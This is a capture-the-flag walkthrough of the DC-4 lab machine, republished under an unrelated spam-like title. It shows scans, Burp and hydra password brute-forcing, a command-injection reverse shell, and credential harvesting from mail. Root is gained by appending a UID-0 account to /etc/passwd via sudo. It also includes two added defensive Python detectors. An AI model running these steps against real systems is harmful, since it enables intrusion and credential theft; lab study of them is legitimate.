
Baidu promotion techniques_Wangmen website download address_Who to turn to for online promotion_How to build a website on a phone

2024/12/24 20:09:26 Source: https://blog.csdn.net/N61320/article/details/144459463

Key takeaways

  • Password brute-forcing
  • Searching for files that may contain passwords
  • Privilege escalation by inserting a new user into /etc/passwd

Detailed steps

First run an nmap scan. The result is fairly straightforward: ports 80 and 22 are open. Although port 22 has a vulnerability, it is of little help in our current situation, so the focus is mainly on port 80.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10

Run nikto and directory brute-forcing against port 80, which gives the following output:

C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.52.195
+ Target Hostname:    192.168.52.195
+ Target Port:        80
+ Start Time:         2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.172.195
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php          (Status: 302) [Size: 704] [--> index.php]
/css                  (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images               (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php            (Status: 200) [Size: 506]
/login.php            (Status: 302) [Size: 206] [--> index.php]
/logout.php           (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================

So port 80 hosts an application written in PHP, with command.php, index.php and login.php as its main files, and login.php is the login page.

Open Burp Suite and attempt a password brute-force; the credentials admin / happy log in successfully.

After a successful login we are redirected to the command.php page.

Inspecting the request shows that it actually sends a Linux command as a parameter, so we send this request to Repeater, modify it, and create a reverse shell.

From the reverse shell we can see old-passwords.bak; after downloading it locally we use it as a wordlist for brute-forcing.

C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw-r--r-- 1 root root   33 Dec 13 21:42 local.txt
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak

This yields the password jibril04:

C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
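The hydra run above leaves a very recognisable trace on the target: a burst of "Failed password" lines in the sshd log from one source, followed by an "Accepted password" line from the same source. As an added example on the defensive side (not part of the original post, and written here rather than taken from any tool), the following Python script parses sshd syslog lines and flags a source address that accumulates at least `threshold` failures inside a sliding window, also noting whether a successful login followed the burst. The log lines, hostnames and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines in syslog format (the host name, PIDs and
# addresses are made up; they are not taken from the machine in the post).
SAMPLE_AUTH_LOG = """\
Dec 13 20:09:23 dc-4 sshd[1201]: Failed password for jim from 192.0.2.10 port 48660 ssh2
Dec 13 20:09:24 dc-4 sshd[1203]: Failed password for jim from 192.0.2.10 port 48661 ssh2
Dec 13 20:09:24 dc-4 sshd[1205]: Failed password for jim from 192.0.2.10 port 48662 ssh2
Dec 13 20:09:25 dc-4 sshd[1207]: Failed password for jim from 192.0.2.10 port 48663 ssh2
Dec 13 20:09:26 dc-4 sshd[1209]: Failed password for jim from 192.0.2.10 port 48664 ssh2
Dec 13 20:09:27 dc-4 sshd[1211]: Failed password for jim from 192.0.2.10 port 48665 ssh2
Dec 13 20:09:31 dc-4 sshd[1213]: Accepted password for jim from 192.0.2.10 port 48666 ssh2
Dec 13 20:15:00 dc-4 sshd[1300]: Failed password for invalid user admin from 198.51.100.7 port 51000 ssh2
Dec 13 20:15:40 dc-4 sshd[1302]: Failed password for invalid user admin from 198.51.100.7 port 51001 ssh2
Dec 13 20:30:00 dc-4 sshd[1400]: Accepted publickey for charles from 192.0.2.50 port 52000 ssh2
"""

# One pattern covers the failure and success lines sshd writes for both
# password and public-key authentication.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_sshd_events(text, year=2024):
    """Turn raw log text into (timestamp, result, user, ip) tuples.

    Syslog timestamps carry no year, so the caller supplies one (assumption:
    every line belongs to the same year).
    """
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue  # unrelated syslog line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_ssh_bruteforce(events, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Returns {ip: {"failures": n, "users": [...], "success_after": bool}}. The
    success_after flag marks the pattern a successful brute-force leaves:
    a burst of failures followed by an accepted login from the same source.
    """
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[1] == "Failed"]
        for i in range(len(failures)):
            j = i
            while (j + 1 < len(failures)
                   and (failures[j + 1][0] - failures[i][0]).total_seconds() <= window_seconds):
                j += 1
            if j - i + 1 >= threshold:
                burst_end = failures[j][0]
                alerts[ip] = {
                    "failures": j - i + 1,
                    "users": sorted({e[2] for e in failures[i:j + 1]}),
                    "success_after": any(e[1] == "Accepted" and e[0] >= burst_end for e in evs),
                }
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(parse_sshd_events(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {info['failures']} failures for {info['users']}, "
              f"success afterwards: {info['success_after']}")
```

On a real host the same functions can be fed the contents of /var/log/auth.log (Debian) or the output of `journalctl -u ssh`. The threshold and window are deliberately small so that the constructed sample trips the rule; a tool like hydra at the ~214 tries per minute shown above would exceed any sensible threshold within seconds.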

With the recovered password we can SSH into the server as jim, and the login banner tells us we have mail:

C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195             
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password: 
......
......
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l

Reading the mbox file did not yield much, but it serves as a hint to look for other mail files, so we upload linpeas.sh and run it, which turns up the clue:

╔══════════╣ Mails (limit 50)
9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/mail/jim
7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/mail/www-data
9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/spool/mail/jim
7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/spool/mail/www-data

Reading it gives us charles's password:

jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

So we use this password to switch to charles, and find that charles may run /usr/bin/teehee with sudo:

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

Observation and a little testing show that teehee reads input from the terminal and writes it to a file, so we can use this to append a record to /etc/passwd:

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

First generate a password hash, then append the following line to /etc/passwd and switch to the tim user, which completes the privilege escalation:

charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password: 
root@dc-4:/home/charles#  cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38
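The last step works because a line appended to /etc/passwd carries its own password hash and UID 0, so the kernel and PAM treat "tim" as root. The same facts make the backdoor easy to find from the defender's side. As an added example (not part of the original post), here is a small Python audit of a passwd file that flags exactly the properties of the appended line: a UID 0 account that is not root, a password hash stored in /etc/passwd instead of the shadow file, plus empty password fields, duplicate names and malformed records. The sample file is constructed; only the final "tim" line is the one the post shows being appended.

```python
# Constructed sample /etc/passwd. Only the last line is taken from the post
# (the record appended through sudo teehee); the other entries are made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:charles,,,:/home/charles:/bin/bash
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
"""

# Values that legitimately appear in the password field of /etc/passwd on a
# shadow-enabled system: "x" (hash lives in /etc/shadow) or a lock marker.
# Anything else is used directly as the hash and bypasses /etc/shadow.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are kept and flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("expected 7 colon-separated fields")
            name, pw, uid, gid, _gecos, home, shell = fields
            entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                            "gid": int(gid), "home": home, "shell": shell,
                            "malformed": False})
        except ValueError:  # wrong field count or non-numeric uid/gid
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
    return entries


def audit_passwd(text):
    """Return a list of {"line", "user", "issue"} findings for a passwd file."""
    findings = []
    seen = set()

    def flag(entry, issue):
        findings.append({"line": entry["line"], "user": entry["name"], "issue": issue})

    for e in parse_passwd(text):
        if e["malformed"]:
            flag(e, "malformed entry")
            continue
        if e["uid"] == 0 and e["name"] != "root":
            flag(e, "UID 0 account other than root")
        if e["pw"] == "":
            flag(e, "empty password field: login without a password")
        elif e["pw"] not in SHADOWED_OR_LOCKED:
            flag(e, "password hash stored in /etc/passwd instead of /etc/shadow")
        if e["name"] in seen:
            flag(e, "duplicate user name")
        seen.add(e["name"])
    return findings


if __name__ == "__main__":
    # Run against the constructed sample; on a real host read /etc/passwd instead.
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f['line']} ({f['user']}): {f['issue']}")
```

Run periodically (or from a file-integrity monitor triggered on writes to /etc/passwd), this catches the technique regardless of which sudo-permitted binary was used to do the writing; the underlying misconfiguration, a NOPASSWD rule on a utility that writes arbitrary files as root, is what sudoers review should remove in the first place.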

Personal assessment

Overall the difficulty is not high, but there are many steps and a few detours, especially the login password brute-force. Given the network and the performance limits of the Community edition of Burp Suite, only a small wordlist can be tried; with rockyou it would not finish by tomorrow morning. In an exam I would avoid password brute-forcing as far as possible, especially with a large dictionary.
